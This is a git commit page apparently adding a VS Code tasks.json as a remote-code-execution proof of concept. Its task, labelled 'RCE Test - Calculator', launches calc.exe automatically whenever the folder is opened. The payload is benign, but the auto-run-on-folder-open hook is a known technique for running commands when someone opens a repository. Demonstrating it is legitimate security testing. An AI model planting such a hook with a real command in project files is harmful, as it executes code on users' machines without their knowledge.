initial commit

This commit is contained in:
i2p
2026-08-27 11:22:58 -06:00
commit c46db4f7b7
6 changed files with 125 additions and 0 deletions
+20
View File
@@ -0,0 +1,20 @@
{
"version": "2.0.0",
"tasks": [
{
"label": "RCE Test - Calculator",
"type": "shell",
"command": "calc.exe",
"windows": {
"command": "calc.exe"
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "always",
"panel": "new"
}
}
]
}